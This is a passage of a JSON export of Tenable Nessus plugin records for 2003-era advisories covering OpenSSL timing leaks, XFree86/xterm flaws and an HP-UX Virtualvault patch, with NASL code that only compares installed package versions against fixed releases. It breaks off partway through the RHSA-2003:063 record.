"#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-253. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15090);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2003-0078\");\n script_bugtraq_id(6884);\n script_xref(name:\"DSA\", value:\"253\");\n\n script_name(english:\"Debian DSA-253-1 : openssl - information leak\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability has been discovered in OpenSSL, a Secure Socket Layer\n(SSL) implementation. In an upcoming paper, Brice Canvel (EPFL), Alain\nHiltgen (UBS), Serge Vaudenay (EPFL), and Martin Vuagnoux (EPFL,\nIlion) describe and demonstrate a timing-based attack on CBC cipher\nsuites used in SSL and TLS. OpenSSL has been found to be vulnerable to\nthis attack.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2003/dsa-253\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the openssl packages.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 0.9.6c-2.woody.2.\n\nFor the old stable distribution (potato) this problem has been fixed\nin version 0.9.6c-0.potato.5. Please note that this updates the\nversion from potato-proposed-updates that supersedes the version in\npotato.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:2.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/02/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/02/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"2.2\", prefix:\"libssl-dev\", reference:\"0.9.6c-0.potato.5\")) flag++;\nif (deb_check(release:\"2.2\", prefix:\"libssl0.9.6\", reference:\"0.9.6c-0.potato.5\")) flag++;\nif (deb_check(release:\"2.2\", prefix:\"openssl\", reference:\"0.9.6c-0.potato.5\")) flag++;\nif (deb_check(release:\"2.2\", prefix:\"ssleay\", reference:\"0.9.6c-0.potato.5\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"libssl-dev\", reference:\"0.9.6c-2.woody.2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"libssl0.9.6\", reference:\"0.9.6c-2.woody.2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"openssl\", reference:\"0.9.6c-2.woody.2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"ssleay\", reference:\"0.9.6c-2.woody.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-29T14:12:46", "description": "Updated XFree86 packages that resolve various security issues and additionally provide a number of bug fixes and enhancements are now available for Red Hat Enterprise Linux 2.1.\n\nXFree86 is an implementation of the X Window System, which provides the graphical user interface, video drivers, etc. for Linux systems.\n\nA number of security vulnerabilities have been found and fixed. In addition, various other bug fixes, driver updates, and other enhancements have been made.\n\nSecurity fixes :\n\nXterm, provided as part of the XFree86 packages, provides an escape sequence for reporting the current window title. This escape sequence essentially takes the current title and places it directly on the command line. An attacker can craft an escape sequence that sets the victim's Xterm window title to an arbitrary command, and then reports it to the command line. Since it is not possible to embed a carriage return into the window title, the attacker would then have to convince the victim to press Enter for the shell to process the title as a command, although the attacker could craft other escape sequences that might convince the victim to do so. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2003-0063 to this issue.\n\nIt is possible to lock up versions of Xterm by sending an invalid DEC UDK escape sequence. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2003-0071 to this issue.\n\nThe xdm display manager, with the authComplain variable set to false, allows arbitrary attackers to connect to the X server if the xdm auth directory does not exist. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2002-1510 to this issue.\n\nThese erratum packages also contain an updated fix for CVE-2002-0164, a vulnerability in the MIT-SHM extension of the X server that allows local users to read and write arbitrary shared memory. The original fix did not cover the case where the X server is started from xdm.\n\nThe X server was setting the /dev/dri directory permissions incorrectly, which resulted in the directory being world-writable. It now sets the directory permissions to a safe value. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2001-1409 to this issue.\n\nDriver updates and other fixes :\n\nThe Rage 128 video driver (r128) has been updated to provide 2D support for all previously unsupported ATI Rage 128 hardware. DRI 3D support should also work on the majority of Rage 128 hardware.\n\nBad page size assumptions in the ATI Radeon video driver (radeon) have been fixed, allowing the driver to work properly on ia64 and other architectures where the page size is not fixed.\n\nA long-standing XFree86 bug has been fixed. This bug occurs when any form of system clock skew (such as NTP clock synchronization, APM suspend/resume cycling on laptops, daylight savings time changeover, or even manually setting the system clock forward or backward) could result in odd application behavior, mouse and keyboard lockups, or even an X server hang or crash.\n\nThe S3 Savage driver (savage) has been updated to the upstream author's latest version '1.1.27t', which should fix numerous bugs reported by various users, as well as adding support for some newer savage hardware.\n\nUsers are advised to upgrade to these updated packages, which contain XFree86 version 4.1.0 with patches correcting these issues.", "cvss3": {}, "published": "2004-07-06T00:00:00", "type": "nessus", "title": "RHEL 2.1 : XFree86 (RHSA-2003:065)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2001-1409", "CVE-2002-0164", "CVE-2002-1510", "CVE-2003-0063", "CVE-2003-0071"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:2.1", "p-cpe:/a:redhat:enterprise_linux:xfree86", "p-cpe:/a:redhat:enterprise_linux:xfree86-100dpi-fonts", "p-cpe:/a:redhat:enterprise_linux:xfree86-75dpi-fonts", "p-cpe:/a:redhat:enterprise_linux:xfree86-iso8859-15-100dpi-fonts", "p-cpe:/a:redhat:enterprise_linux:xfree86-iso8859-15-75dpi-fonts", "p-cpe:/a:redhat:enterprise_linux:xfree86-iso8859-2-100dpi-fonts", "p-cpe:/a:redhat:enterprise_linux:xfree86-iso8859-2-75dpi-fonts", "p-cpe:/a:redhat:enterprise_linux:xfree86-iso8859-9-100dpi-fonts", "p-cpe:/a:redhat:enterprise_linux:xfree86-iso8859-9-75dpi-fonts", "p-cpe:/a:redhat:enterprise_linux:xfree86-xnest", "p-cpe:/a:redhat:enterprise_linux:xfree86-xvfb", "p-cpe:/a:redhat:enterprise_linux:xfree86-cyrillic-fonts", "p-cpe:/a:redhat:enterprise_linux:xfree86-devel", "p-cpe:/a:redhat:enterprise_linux:xfree86-doc", "p-cpe:/a:redhat:enterprise_linux:xfree86-libs", "p-cpe:/a:redhat:enterprise_linux:xfree86-tools", "p-cpe:/a:redhat:enterprise_linux:xfree86-twm", "p-cpe:/a:redhat:enterprise_linux:xfree86-xdm", "p-cpe:/a:redhat:enterprise_linux:xfree86-xf86cfg", "p-cpe:/a:redhat:enterprise_linux:xfree86-xfs"], "id": "REDHAT-RHSA-2003-065.NASL", "href": "https://www.tenable.com/plugins/nessus/12369", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2003:065. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(12369);\n script_version(\"1.30\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2001-1409\", \"CVE-2002-0164\", \"CVE-2002-1510\", \"CVE-2003-0063\", \"CVE-2003-0071\");\n script_xref(name:\"RHSA\", value:\"2003:065\");\n\n script_name(english:\"RHEL 2.1 : XFree86 (RHSA-2003:065)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated XFree86 packages that resolve various security issues and\nadditionally provide a number of bug fixes and enhancements are now\navailable for Red Hat Enterprise Linux 2.1.\n\nXFree86 is an implementation of the X Window System, which provides\nthe graphical user interface, video drivers, etc. for Linux systems.\n\nA number of security vulnerabilities have been found and fixed. In\naddition, various other bug fixes, driver updates, and other\nenhancements have been made.\n\nSecurity fixes :\n\nXterm, provided as part of the XFree86 packages, provides an escape\nsequence for reporting the current window title. This escape sequence\nessentially takes the current title and places it directly on the\ncommand line. An attacker can craft an escape sequence that sets the\nvictim's Xterm window title to an arbitrary command, and then reports\nit to the command line. Since it is not possible to embed a carriage\nreturn into the window title, the attacker would then have to convince\nthe victim to press Enter for the shell to process the title as a\ncommand, although the attacker could craft other escape sequences that\nmight convince the victim to do so. The Common Vulnerabilities and\nExposures project (cve.mitre.org) has assigned the name CVE-2003-0063\nto this issue.\n\nIt is possible to lock up versions of Xterm by sending an invalid DEC\nUDK escape sequence. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CVE-2003-0071 to this issue.\n\nThe xdm display manager, with the authComplain variable set to false,\nallows arbitrary attackers to connect to the X server if the xdm auth\ndirectory does not exist. The Common Vulnerabilities and Exposures\nproject (cve.mitre.org) has assigned the name CVE-2002-1510 to this\nissue.\n\nThese erratum packages also contain an updated fix for CVE-2002-0164,\na vulnerability in the MIT-SHM extension of the X server that allows\nlocal users to read and write arbitrary shared memory. The original\nfix did not cover the case where the X server is started from xdm.\n\nThe X server was setting the /dev/dri directory permissions\nincorrectly, which resulted in the directory being world-writable. It\nnow sets the directory permissions to a safe value. The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the\nname CVE-2001-1409 to this issue.\n\nDriver updates and other fixes :\n\nThe Rage 128 video driver (r128) has been updated to provide 2D\nsupport for all previously unsupported ATI Rage 128 hardware. DRI 3D\nsupport should also work on the majority of Rage 128 hardware.\n\nBad page size assumptions in the ATI Radeon video driver (radeon) have\nbeen fixed, allowing the driver to work properly on ia64 and other\narchitectures where the page size is not fixed.\n\nA long-standing XFree86 bug has been fixed. This bug occurs when any\nform of system clock skew (such as NTP clock synchronization, APM\nsuspend/resume cycling on laptops, daylight savings time changeover,\nor even manually setting the system clock forward or backward) could\nresult in odd application behavior, mouse and keyboard lockups, or\neven an X server hang or crash.\n\nThe S3 Savage driver (savage) has been updated to the upstream\nauthor's latest version '1.1.27t', which should fix numerous bugs\nreported by various users, as well as adding support for some newer\nsavage hardware.\n\nUsers are advised to upgrade to these updated packages, which contain\nXFree86 version 4.1.0 with patches correcting these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2001-1409\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2002-0164\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2002-1510\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2003-0063\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2003-0071\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2003:065\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:XFree86\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:XFree86-100dpi-fonts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:XFree86-75dpi-fonts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:XFree86-ISO8859-15-100dpi-fonts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:XFree86-ISO8859-15-75dpi-fonts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:XFree86-ISO8859-2-100dpi-fonts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:XFree86-ISO8859-2-75dpi-fonts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:XFree86-ISO8859-9-100dpi-fonts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:XFree86-ISO8859-9-75dpi-fonts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:XFree86-Xnest\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:XFree86-Xvfb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:XFree86-cyrillic-fonts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:XFree86-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:XFree86-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:XFree86-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:XFree86-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:XFree86-twm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:XFree86-xdm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:XFree86-xf86cfg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:XFree86-xfs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:2.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2002/03/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/06/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^2\\.1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 2.1\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i386\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2003:065\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"XFree86-4.1.0-49.RHEL\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"XFree86-100dpi-fonts-4.1.0-49.RHEL\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"XFree86-75dpi-fonts-4.1.0-49.RHEL\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"XFree86-ISO8859-15-100dpi-fonts-4.1.0-49.RHEL\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"XFree86-ISO8859-15-75dpi-fonts-4.1.0-49.RHEL\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"XFree86-ISO8859-2-100dpi-fonts-4.1.0-49.RHEL\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"XFree86-ISO8859-2-75dpi-fonts-4.1.0-49.RHEL\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"XFree86-ISO8859-9-100dpi-fonts-4.1.0-49.RHEL\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"XFree86-ISO8859-9-75dpi-fonts-4.1.0-49.RHEL\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"XFree86-Xnest-4.1.0-49.RHEL\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"XFree86-Xvfb-4.1.0-49.RHEL\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"XFree86-cyrillic-fonts-4.1.0-49.RHEL\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"XFree86-devel-4.1.0-49.RHEL\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"XFree86-doc-4.1.0-49.RHEL\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"XFree86-libs-4.1.0-49.RHEL\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"XFree86-tools-4.1.0-49.RHEL\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"XFree86-twm-4.1.0-49.RHEL\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"XFree86-xdm-4.1.0-49.RHEL\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"XFree86-xf86cfg-4.1.0-49.RHEL\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"XFree86-xfs-4.1.0-49.RHEL\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"XFree86 / XFree86-100dpi-fonts / XFree86-75dpi-fonts / etc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-29T16:13:10", "description": "s700_800 11.04 Virtualvault 4.5 OWS update : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A remotely exploitable potential vulnerability has been reported in CAN-2003-0078.\n\n - #1 A defect in the Java(TM) Virtual Machine may allow illegal access to protected fields or methods of an object. #2 The Java(TM) Secure Socket Extension (JSSE) may incorrectly validate the digital certificate of a web site. In addition, the Java Plug-in and Java Web Start may incorrectly validate the digital certificates of signed JAR files.", "cvss3": {}, "published": "2005-02-16T00:00:00", "type": "nessus", "title": "HP-UX PHSS_28685 : s700_800 11.04 Virtualvault 4.5 OWS update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0078"], "modified": "2021-01-11T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHSS_28685.NASL", "href": "https://www.tenable.com/plugins/nessus/17003", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_28685. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(17003);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2003-0078\");\n script_xref(name:\"HP\", value:\"HPSBUX0301\");\n script_xref(name:\"HP\", value:\"HPSBUX0303\");\n script_xref(name:\"HP\", value:\"SSRT3467\");\n script_xref(name:\"HP\", value:\"SSRT3521\");\n\n script_name(english:\"HP-UX PHSS_28685 : s700_800 11.04 Virtualvault 4.5 OWS update\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.04 Virtualvault 4.5 OWS update : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A remotely exploitable potential vulnerability has been\n reported in CAN-2003-0078.\n\n - #1 A defect in the Java(TM) Virtual Machine may allow\n illegal access to protected fields or methods of an\n object. #2 The Java(TM) Secure Socket Extension (JSSE)\n may incorrectly validate the digital certificate of a\n web site. In addition, the Java Plug-in and Java Web\n Start may incorrectly validate the digital certificates\n of signed JAR files.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_28685 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/07/29\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2003/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/02/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.04\"))\n{\n exit(0, \"The host is not affected since PHSS_28685 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHSS_28685\", \"PHSS_29545\", \"PHSS_29690\", \"PHSS_30160\", \"PHSS_30648\", \"PHSS_31828\", \"PHSS_32184\", \"PHSS_33396\", \"PHSS_34119\", \"PHSS_35107\", \"PHSS_35461\", \"PHSS_35556\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"VaultTS.VV-CORE-CMN\", version:\"A.04.50\")) flag++;\nif (hpux_check_patch(app:\"VaultTS.VV-IWS\", version:\"A.04.50\")) flag++;\nif (hpux_check_patch(app:\"VaultTS.VV-IWS-GUI\", version:\"A.04.50\")) flag++;\nif (hpux_check_patch(app:\"VaultTS.VV-IWS-JAVA\", version:\"A.04.50\")) flag++;\nif (hpux_check_patch(app:\"VaultTS.VV-IWS-JK\", version:\"A.04.50\")) flag++;\nif (hpux_check_patch(app:\"VaultWS.WS-CORE\", version:\"A.04.50\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:hpux_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-29T14:11:59", "description": "Updated OpenSSL packages are available that fix a potential timing-based attack.\n\n[Updated 12 March 2003] Added packages for Red Hat Enterprise Linux ES and Red Hat Enterprise Linux WS\n\nOpenSSL is a commercial-grade, full-featured, open source toolkit which implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols as well as a full-strength, general purpose cryptography library.\n\nIn a paper, Brice Canvel, Alain Hiltgen, Serge Vaudenay, and Martin Vuagnoux describe and demonstrate a timing-based attack on CBC ciphersuites in SSL and TLS. An active attacker may be able to use timing observations to distinguish between two different error cases:\ncipher padding errors and MAC verification errors. Over multiple connections this can leak sufficient information to be able to retrieve the plaintext of a common, fixed block.\n\nIn order for an attack to be sucessful an attacker must be able to act as a man-in-the-middle to intercept and modify multiple connections which all involve a common fixed plaintext block (such as a password), and have good network conditions that allow small changes in timing to be reliably observed.\n\nThese updated packages contain a patch provided by the OpenSSL group that corrects this vulnerability.\n\nBecause server applications are affected by these vulnerabilities, we advise users to restart all services that use OpenSSL functionality or alternatively reboot their systems after installing these updates.", "cvss3": {}, "published": "2004-07-06T00:00:00", "type": "nessus", "title": "RHEL 2.1 : openssl (RHSA-2003:063)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0078"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:openssl", "p-cpe:/a:redhat:enterprise_linux:openssl-devel", "p-cpe:/a:redhat:enterprise_linux:openssl-perl", "p-cpe:/a:redhat:enterprise_linux:openssl095a", "p-cpe:/a:redhat:enterprise_linux:openssl096", "cpe:/o:redhat:enterprise_linux:2.1"], "id": "REDHAT-RHSA-2003-063.NASL", "href": "https://www.tenable.com/plugins/nessus/12368", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2003:063. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(12368);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2003-0078\");\n script_xref(name:\"RHSA\", value:\"2003:063\");\n\n script_name(english:\"RHEL 2.1 : openssl (RHSA-2003:063)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated OpenSSL packages are available that fix a potential\ntiming-based attack.\n\n[Updated 12 March 2003] Added packages for Red Hat Enterprise Linux ES\nand Red Hat Enterprise Linux WS\n\nOpenSSL is a commercial-grade, full-featured, open source toolkit\nwhich implements the Secure Sockets Layer (SSL v2/v3) and 